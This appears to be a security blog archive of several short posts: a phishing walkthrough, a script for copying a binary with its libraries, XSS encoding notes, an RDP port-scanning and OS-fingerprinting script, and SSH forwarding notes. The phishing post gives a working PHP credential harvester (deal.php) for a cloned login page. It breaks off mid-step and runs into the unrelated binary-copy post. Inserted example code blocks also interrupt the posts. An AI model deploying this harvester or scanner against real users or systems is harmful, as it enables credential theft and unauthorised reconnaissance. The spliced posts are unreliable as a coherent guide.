wubba lubba dub dub.
post @ 2017-04-01

[XSS phishing simulation in practice] https://bbs.ichunqiu.com/thread-17965-1-1.html

Preparation

Target login page: login.html
Fake login page: fake.html
The best language in the world: deal.php
fish.js

Phishing steps

  • First download the target login.html and save it as fake.html: wget -r -p -np -k <site URL>

Then replace the POST target used at login time, e.g. <form action="http://normal.com/login.php" method="post">, with your own deal.php page.

Note: some of the js or css in the page is not referenced by absolute path and has to be changed to absolute paths; it is easiest to download login.html directly with wget.

  • Then build a deal.php on the server
<?php
$user = $_POST['username'];
$pass = $_POST['password'];
$f = fopen('pass.txt','a');
fwrite($f, "User:".$user."Pass:".$pass."\n");
fclose($f);
header("Location: http://normal.com/manage"); // redirect to the real backend
?>
  • One js file is still missing

Requirement: copy a command from one Linux machine to another; the command depends on dynamic libraries, gcc for example:

ldd `which gcc`
	linux-vdso.so.1 =>  (0x00007fffdb7eb000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcf12441000)
	/lib64/ld-linux-x86-64.so.2 (0x000055a28350c000)

In that case copying gcc alone is useless; a quick Google search turned up this bash script:

#!/bin/bash

if [ $# != 2 ] ; then
    echo "usage $0 PATH_TO_BINARY TARGET_FOLDER"
    exit 1
fi

PATH_TO_BINARY="$1"
TARGET_FOLDER="$2"

# if we cannot find the binary we have to abort
if [ ! -f "$PATH_TO_BINARY" ] ; then
    echo "The file '$PATH_TO_BINARY' was not found. Aborting!"
    exit 1
fi

# copy the binary to the target folder
# create directories if required
echo "---> copy binary itself"
cp --parents -v "$PATH_TO_BINARY" "$TARGET_FOLDER"

# copy the required shared libs to the target folder
# create directories if required
echo "---> copy libraries"
for lib in `ldd "$PATH_TO_BINARY" | cut -d'>' -f2 | awk '{print $1}'` ; do
   if [ -f "$lib" ] ; then
        cp -v --parents "$lib" "$TARGET_FOLDER"
   fi  
done

# I'm on a 64bit system at home. the following code will be not required on a 32bit system.
# however, I've not tested that yet
# create lib64 - if required and link the content from lib to it
if [ ! -d "$TARGET_FOLDER/lib64" ] ; then
    mkdir -v "$TARGET_FOLDER/lib64"
fi

Usage: exportbin.sh <path to the binary> <target folder>

post @ 2017-03-02

HTML entity encodings, such as the decimal and hexadecimal forms, have to be placed inside HTML tags.

Fun fact, decoding order:
1. HTML decoding
2. URL decoding
3. JavaScript decoding

http://slides.com/mscasharjaved/deck-13#/169

Three kinds of encoding; for HTML these are the decimal and hexadecimal forms.

HTML angle bracket

  • decimal: &#60;
  • HTML hexadecimal: &#x3c;

JavaScript octal, hexadecimal and unicode encodings:

angle bracket -->

  • octal: \74
  • hexadecimal: \x3c
  • unicode: \u003c

URL encoding and base64 encoding (<)

  • url: %3C
  • base64: PA==
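As an added example (not from the post), a Python 3 script that reproduces the encodings of `<` listed above and then applies the decoding order from the slides (HTML, then URL, then JavaScript). It shows why a filter that inspects only the raw string misses every encoded form while one that normalizes first does not; the stacked inputs such as `&#37;3C` are constructed for this example, and the function models the order the post gives rather than the per-context behaviour of a real browser.

```python
import base64
import html
import re
import urllib.parse

# The encodings of '<' listed in the post, kept as constructed reference data.
LT_FORMS = {
    "html_dec": "&#60;", "html_hex": "&#x3c;",
    "js_octal": r"\74", "js_hex": r"\x3c", "js_unicode": r"\u003c",
    "url": "%3C", "base64": "PA==",
}

def encode_all(ch):
    """Produce the post's seven encodings of one ASCII character."""
    c = ord(ch)
    return {
        "html_dec": "&#%d;" % c, "html_hex": "&#x%x;" % c,
        "js_octal": "\\%o" % c, "js_hex": "\\x%02x" % c, "js_unicode": "\\u%04x" % c,
        "url": urllib.parse.quote(ch, safe=""),
        "base64": base64.b64encode(ch.encode()).decode(),
    }

# JavaScript string escapes the post lists: \uXXXX, \xXX and octal \NNN.
_JS_ESCAPE = re.compile(r"\\(u[0-9a-fA-F]{4}|x[0-9a-fA-F]{2}|[0-7]{1,3})")

def js_unescape(s):
    def repl(m):
        body = m.group(1)
        return chr(int(body[1:], 16)) if body[0] in "ux" else chr(int(body, 8))
    return _JS_ESCAPE.sub(repl, s)

def decode_in_browser_order(s):
    """The post's decoding order: HTML entities, then URL escapes, then JS escapes.
    base64 is not touched by any of these layers; it only decodes via an explicit atob()."""
    return js_unescape(urllib.parse.unquote(html.unescape(s)))

def contains_lt_naive(s):
    """Checks only the raw string, so every encoded form slips past."""
    return "<" in s

def contains_lt_normalized(s):
    """Normalizes through all three layers before checking: the defensive variant."""
    return "<" in decode_in_browser_order(s)

if __name__ == "__main__":
    for name, form in LT_FORMS.items():
        print("%-10s %-7s naive=%-5s normalized=%s" % (name, form,
              contains_lt_naive(form), contains_lt_normalized(form)))
    # Two layers stacked: '&#37;3C' HTML-decodes to '%3C', which URL-decodes to '<'.
    print("&#37;3C ->", repr(decode_in_browser_order("&#37;3C")))
```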
post @ 2017-02-28

I have not really looked into how nmap scans; all I know is that when I scanned the target server with nmap nothing came back, so I analysed the 3389 remote desktop connection process specifically. Put simply it goes like this:

  • TCP three-way handshake
  • the client sends a COTP packet
  • the server sends a TPKT packet

It turns out that with socket programming it is this simple: capture the traffic in Wireshark, then wrap the TCP payload as hex and send it out.

The final Python script looks like this:

#!/usr/bin/python
# coding: utf-8

import socket
import binascii
import sys
import threading
from Queue import Queue


def verify(sock, port):
    # read the server's reply and compare it with the known fingerprints
    while 1:
        buff = sock.recv(2048)
        if not buff:
            break
        b = bytearray(buff)
        print "[+] %s" % binascii.hexlify(b)
        detect_os(binascii.hexlify(b), port)


def detect_os(res, port):
    # hex of the whole reply (TPKT header + X.224 Connection Confirm, plus the
    # RDP negotiation structure where the server sends one); it differs per version
    d = {
        "2000": "0300000b06d00000123400",
        "2003": "030000130ed000001234000300080002000000",
        "2008": "030000130ed000001234000200080002000000",
        "win7OR2008R2": "030000130ed000001234000209080002000000",
        "2008R2DC": "030000130ed000001234000201080002000000",
        "2012R2OR8": "030000130ed00000123400020f080002000000"
    }
    for key, value in d.iteritems():
        if value == res:
            print "[+] Os May be: %s" % key
            print "[+] RDP Port is %s" % port
            sys.exit(0)


def send_payload(sock):
    # TPKT header + X.224 Connection Request carrying an RDP negotiation request
    sock.send("\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00")


def worker():
    while not q.empty():
        port = q.get()
        try:
            scan(port)
        finally:
            q.task_done()


def scan(port):
    # create the socket outside the try block so s.close() below always has a socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(2)
    try:
        sys.stdout.write('[+] Check Port %s \r' % port)
        sys.stdout.flush()
        if s.connect_ex((ip, port)) == 0:
            print "[+] Connect Success %s" % port
            send_payload(s)
            verify(s, port)
    except Exception, e:
        pass
    s.close()


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "Usage: %s IP" % sys.argv[0]
        sys.exit(0)
    ip = sys.argv[1]
    q = Queue()
    map(q.put, xrange(3300, 65535))
    threads = [threading.Thread(target=worker) for i in xrange(50)]
    map(lambda x: x.start(), threads)
    q.join()
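As an added example that is not part of the post (Python 3, written for this page), a parser for the reply the script above compares byte-for-byte against its fingerprint table. It splits the TPKT header, the X.224 Connection Confirm and, when the server appends one, the RDP negotiation structure, which is where the per-version differences sit (the flags byte) and which also tells a defender which security protocol the server actually selected. Flag, protocol and failure-code names follow MS-RDPBCGR; the sample replies are the hex strings from the post.

```python
import struct
from dataclasses import dataclass

# Constructed sample input: the server replies recorded in the post, as hex.
SAMPLE_REPLIES = {
    "2000": "0300000b06d00000123400",
    "2003": "030000130ed000001234000300080002000000",
    "win7OR2008R2": "030000130ed000001234000209080002000000",
    "2012R2OR8": "030000130ed00000123400020f080002000000",
}
# RDP_NEG_RSP flag and protocol names from MS-RDPBCGR 2.2.1.2.1 (bit 0x04 is reserved).
NEG_RSP_FLAGS = {0x01: "EXTENDED_CLIENT_DATA_SUPPORTED", 0x02: "DYNVC_GFX_PROTOCOL_SUPPORTED",
                 0x08: "RESTRICTED_ADMIN_MODE_SUPPORTED", 0x10: "REDIRECTED_AUTHENTICATION_MODE_SUPPORTED"}
PROTOCOLS = {0: "PROTOCOL_RDP", 1: "PROTOCOL_SSL", 2: "PROTOCOL_HYBRID", 8: "PROTOCOL_HYBRID_EX"}

@dataclass
class ConnectConfirm:
    tpkt_length: int
    src_ref: int
    negotiation: bool                 # False when the server answered with a bare X.224 CC
    flags: tuple = ()
    selected_protocol: str = None     # set for RDP_NEG_RSP (type 0x02)
    failure_code: int = None          # set for RDP_NEG_FAILURE (type 0x03), e.g. 2 = SSL_NOT_ALLOWED_BY_SERVER

def parse_connect_confirm(raw: bytes) -> ConnectConfirm:
    """Split a reply into TPKT header, X.224 Connection Confirm and optional RDP negotiation."""
    if len(raw) < 11 or raw[0] != 0x03 or struct.unpack(">H", raw[2:4])[0] != len(raw):
        raise ValueError("not a complete TPKT packet")
    li, code = raw[4], raw[5]                       # X.224 length indicator and TPDU code
    if code & 0xF0 != 0xD0:                         # 0xD0 = Connection Confirm
        raise ValueError("X.224 code 0x%02x is not a Connection Confirm" % code)
    body = raw[11:5 + li]                           # user data after DST-REF, SRC-REF, class
    cc = ConnectConfirm(len(raw), struct.unpack(">H", raw[8:10])[0], bool(body))
    if body:
        ntype, flags, nlen = body[0], body[1], struct.unpack("<H", body[2:4])[0]
        if nlen != 8 or len(body) != 8:             # negotiation structures are 8 bytes, little-endian
            raise ValueError("bad RDP negotiation structure length")
        value = struct.unpack("<I", body[4:8])[0]
        cc.flags = tuple(name for bit, name in NEG_RSP_FLAGS.items() if flags & bit)
        if ntype == 0x02:
            cc.selected_protocol = PROTOCOLS.get(value, "UNKNOWN_0x%x" % value)
        elif ntype == 0x03:
            cc.failure_code = value
        else:
            raise ValueError("unknown negotiation type 0x%02x" % ntype)
    return cc

def parse_hex(h: str) -> ConnectConfirm:
    return parse_connect_confirm(bytes.fromhex(h))
```

The "2000" reply carries no negotiation structure at all, which is why that fingerprint is 11 bytes rather than 19; the "2003" reply is a negotiation failure, not a response.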
post @ 2017-02-16

A few principles:

  • SSH is, simply put, a secure data channel between two machines; it has two roles, the ssh client and the ssh server, and such a channel is an SSH tunnel (ssh tunneling)
  • SSH port forwarding needs an SSH connection, and an SSH connection has a direction: from the SSH client to the SSH server
  • Likewise an application request has a direction, normally from the client to the server
  • When these two directions are the same it is called SSH local forwarding (-L); when they are opposite it is remote forwarding (-R)

Local forwarding

ssh -L <local port>:<host>:<hostport> <sshserver>

Establish a connection to host via sshserver, and bind host's hostport to the local port localport.

Scenario: say there is an application server appserver (appserver.com) whose port 80 you need to reach, but it cannot be reached directly from the local machine; you can get to it via an sshserver (sshserver.com) that can reach appserver.
ssh -L 8000:appserver.com:80 user@sshserver.com

Once the ssh connection is established, packets sent to local port 8000 are forwarded through sshserver to appserver's port 80.

Remote forwarding

ssh -R <remoteport>:<host>:<hostport> <remoteserver>
Remote forwarding connects remoteserver to host through the local machine; host's hostport is mapped to remoteserver's remoteport.

Scenario: an application server appserver (appserver.com) whose port 80 can only be reached from the local machine; if remoteserver wants to reach appserver's port 80, it has to tunnel through the local machine.
